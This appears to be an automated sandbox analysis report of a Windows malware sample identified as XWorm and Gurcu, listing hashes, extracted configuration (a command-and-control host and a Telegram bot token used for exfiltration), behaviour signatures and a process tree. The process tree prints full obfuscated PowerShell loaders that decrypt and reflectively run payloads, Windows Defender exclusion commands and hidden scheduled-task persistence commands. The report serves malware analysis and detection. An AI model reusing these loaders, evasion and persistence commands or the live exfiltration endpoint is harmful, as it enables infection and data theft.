Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07-08-2024 14:45
Static task
static1
Behavioral task
behavioral1
Sample
fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
Resource
win7-20240708-en
General
-
Target
fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
-
Size
19.2MB
-
MD5
aa4bb4c57074e543076b145b7399cd64
-
SHA1
5e36e64cc686fa553b43d1c274d1a15e18b50501
-
SHA256
fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7
-
SHA512
ff38fc85d51fda9d32668949d2f67074be1e52cb6d63978155347173452199687935b9e96d3a060c7ab74461c5f4228b2c4cf8a0486ca5bbd9ea962a1c16c5eb
-
SSDEEP
393216:0W7LVQgX47mXZGbWVQjFLICQA122lrL8jiQIthY4eqfIgUJzM8/bX9Wwy:NBfXZGbBjFLICB1hUji1tWbZT9W/
Malware Config
Extracted
xworm
floor-talked.gl.at.ply.gg:52348
-
Install_directory
%AppData%
-
install_file
processor.exe
-
telegram
https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635
Extracted
gurcu
https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2956-223-0x00000198D7B30000-0x00000198D7B46000-memory.dmp family_xworm -
Blocklisted process makes network request 13 IoCs
flow pid Process 14 4296 powershell.exe 16 2956 powershell.exe 33 2956 powershell.exe 34 4296 powershell.exe 35 4296 powershell.exe 40 2956 powershell.exe 41 4296 powershell.exe 42 2956 powershell.exe 48 4296 powershell.exe 49 2956 powershell.exe 50 4296 powershell.exe 51 2956 powershell.exe 52 4296 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4116 powershell.exe 2564 powershell.exe 4744 powershell.exe 1340 powershell.exe 2652 powershell.exe 3976 powershell.exe 2476 powershell.exe 5088 powershell.exe 228 powershell.exe 3548 powershell.exe 4844 powershell.exe 2956 powershell.exe 1800 powershell.exe 456 powershell.exe 2744 powershell.exe 4296 powershell.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4084 attrib.exe 4992 attrib.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation S500RAT.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\processor.lnk powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 4300 S500RAT.exe 3172 S500RAT.exe 1548 system.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\system\\system.exe\"" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 4752 timeout.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2956 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4116 powershell.exe 4116 powershell.exe 2564 powershell.exe 2564 powershell.exe 2652 powershell.exe 4744 powershell.exe 2652 powershell.exe 4744 powershell.exe 3976 powershell.exe 3976 powershell.exe 1340 powershell.exe 1340 powershell.exe 2476 powershell.exe 5088 powershell.exe 5088 powershell.exe 2476 powershell.exe 2476 powershell.exe 5088 powershell.exe 228 powershell.exe 228 powershell.exe 228 powershell.exe 1800 powershell.exe 1800 powershell.exe 1800 powershell.exe 456 powershell.exe 456 powershell.exe 456 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 2956 powershell.exe 2956 powershell.exe 2956 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 3548 powershell.exe 2744 powershell.exe 2744 powershell.exe 2744 powershell.exe 4296 powershell.exe 4296 powershell.exe 4296 powershell.exe 4296 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4116 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe Token: SeDebugPrivilege 4744 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeIncreaseQuotaPrivilege 2476 powershell.exe Token: SeSecurityPrivilege 2476 powershell.exe Token: SeTakeOwnershipPrivilege 2476 powershell.exe Token: SeLoadDriverPrivilege 2476 powershell.exe Token: SeSystemProfilePrivilege 2476 powershell.exe Token: SeSystemtimePrivilege 2476 powershell.exe Token: SeProfSingleProcessPrivilege 2476 powershell.exe Token: SeIncBasePriorityPrivilege 2476 powershell.exe Token: SeCreatePagefilePrivilege 2476 powershell.exe Token: SeBackupPrivilege 2476 powershell.exe Token: SeRestorePrivilege 2476 powershell.exe Token: SeShutdownPrivilege 2476 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeSystemEnvironmentPrivilege 2476 powershell.exe Token: SeRemoteShutdownPrivilege 2476 powershell.exe Token: SeUndockPrivilege 2476 powershell.exe Token: SeManageVolumePrivilege 2476 powershell.exe Token: 33 2476 powershell.exe Token: 34 2476 powershell.exe Token: 35 2476 powershell.exe Token: 36 2476 powershell.exe Token: SeIncreaseQuotaPrivilege 5088 powershell.exe Token: SeSecurityPrivilege 5088 powershell.exe Token: SeTakeOwnershipPrivilege 5088 powershell.exe Token: SeLoadDriverPrivilege 5088 powershell.exe Token: SeSystemProfilePrivilege 5088 powershell.exe Token: SeSystemtimePrivilege 5088 powershell.exe Token: SeProfSingleProcessPrivilege 5088 powershell.exe Token: SeIncBasePriorityPrivilege 5088 powershell.exe Token: SeCreatePagefilePrivilege 5088 powershell.exe Token: SeBackupPrivilege 5088 powershell.exe Token: SeRestorePrivilege 5088 powershell.exe Token: SeShutdownPrivilege 5088 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeSystemEnvironmentPrivilege 5088 powershell.exe Token: SeRemoteShutdownPrivilege 5088 powershell.exe Token: SeUndockPrivilege 5088 powershell.exe Token: SeManageVolumePrivilege 5088 powershell.exe Token: 33 5088 powershell.exe Token: 34 5088 powershell.exe Token: 35 5088 powershell.exe Token: 36 5088 powershell.exe Token: SeIncreaseQuotaPrivilege 5088 powershell.exe Token: SeSecurityPrivilege 5088 powershell.exe Token: SeTakeOwnershipPrivilege 5088 powershell.exe Token: SeLoadDriverPrivilege 5088 powershell.exe Token: SeSystemProfilePrivilege 5088 powershell.exe Token: SeSystemtimePrivilege 5088 powershell.exe Token: SeProfSingleProcessPrivilege 5088 powershell.exe Token: SeIncBasePriorityPrivilege 5088 powershell.exe Token: SeCreatePagefilePrivilege 5088 powershell.exe Token: SeBackupPrivilege 5088 powershell.exe Token: SeRestorePrivilege 5088 powershell.exe Token: SeShutdownPrivilege 5088 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeSystemEnvironmentPrivilege 5088 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2956 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3380 wrote to memory of 4300 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 86 PID 3380 wrote to memory of 4300 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 86 PID 3380 wrote to memory of 4116 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 87 PID 3380 wrote to memory of 4116 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 87 PID 3380 wrote to memory of 1028 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 89 PID 3380 wrote to memory of 1028 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 89 PID 3380 wrote to memory of 2564 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 91 PID 3380 wrote to memory of 2564 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 91 PID 4300 wrote to memory of 3172 4300 S500RAT.exe 93 PID 4300 wrote to memory of 3172 4300 S500RAT.exe 93 PID 4300 wrote to memory of 4744 4300 S500RAT.exe 94 PID 4300 wrote to memory of 4744 4300 S500RAT.exe 94 PID 1028 wrote to memory of 2652 1028 cmd.exe 96 PID 1028 wrote to memory of 2652 1028 cmd.exe 96 PID 3380 wrote to memory of 4552 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 97 PID 3380 wrote to memory of 4552 3380 fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe 97 PID 4552 wrote to memory of 3976 4552 cmd.exe 99 PID 4552 wrote to memory of 3976 4552 cmd.exe 99 PID 4300 wrote to memory of 2124 4300 S500RAT.exe 100 PID 4300 wrote to memory of 2124 4300 S500RAT.exe 100 PID 4300 wrote to memory of 1340 4300 S500RAT.exe 102 PID 4300 wrote to memory of 1340 4300 S500RAT.exe 102 PID 4300 wrote to memory of 4788 4300 S500RAT.exe 105 PID 4300 wrote to memory of 4788 4300 S500RAT.exe 105 PID 3976 wrote to memory of 2476 3976 powershell.exe 107 PID 3976 wrote to memory of 2476 3976 powershell.exe 107 PID 2652 wrote to memory of 5088 2652 powershell.exe 109 PID 2652 wrote to memory of 5088 2652 powershell.exe 109 PID 3976 wrote to memory of 3028 3976 powershell.exe 111 PID 3976 wrote to memory of 3028 3976 powershell.exe 111 PID 2652 wrote to memory of 800 2652 powershell.exe 112 PID 2652 wrote to memory of 800 2652 powershell.exe 112 PID 800 wrote to memory of 976 800 WScript.exe 113 PID 800 wrote to memory of 976 800 WScript.exe 113 PID 3028 wrote to memory of 4864 3028 WScript.exe 114 PID 3028 wrote to memory of 4864 3028 WScript.exe 114 PID 2124 wrote to memory of 228 2124 cmd.exe 117 PID 2124 wrote to memory of 228 2124 cmd.exe 117 PID 228 wrote to memory of 1800 228 powershell.exe 118 PID 228 wrote to memory of 1800 228 powershell.exe 118 PID 228 wrote to memory of 956 228 powershell.exe 120 PID 228 wrote to memory of 956 228 powershell.exe 120 PID 956 wrote to memory of 4952 956 WScript.exe 121 PID 956 wrote to memory of 4952 956 WScript.exe 121 PID 4788 wrote to memory of 456 4788 cmd.exe 123 PID 4788 wrote to memory of 456 4788 cmd.exe 123 PID 4864 wrote to memory of 3548 4864 cmd.exe 124 PID 4864 wrote to memory of 3548 4864 cmd.exe 124 PID 456 wrote to memory of 4844 456 powershell.exe 125 PID 456 wrote to memory of 4844 456 powershell.exe 125 PID 976 wrote to memory of 2956 976 cmd.exe 127 PID 976 wrote to memory of 2956 976 cmd.exe 127 PID 456 wrote to memory of 2984 456 powershell.exe 128 PID 456 wrote to memory of 2984 456 powershell.exe 128 PID 2984 wrote to memory of 1488 2984 WScript.exe 129 PID 2984 wrote to memory of 1488 2984 WScript.exe 129 PID 3548 wrote to memory of 4084 3548 powershell.exe 131 PID 3548 wrote to memory of 4084 3548 powershell.exe 131 PID 3548 wrote to memory of 4992 3548 powershell.exe 133 PID 3548 wrote to memory of 4992 3548 powershell.exe 133 PID 4952 wrote to memory of 2744 4952 cmd.exe 135 PID 4952 wrote to memory of 2744 4952 cmd.exe 135 PID 1488 wrote to memory of 4296 1488 cmd.exe 136 PID 1488 wrote to memory of 4296 1488 cmd.exe 136 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4992 attrib.exe 4084 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe"C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"3⤵
- Executes dropped EXE
PID:3172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_166_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_166.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1800
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_166.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_166.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_166.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2744
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_58_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_58.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4844
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_58.vbs"5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_58.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_58.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4296
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { 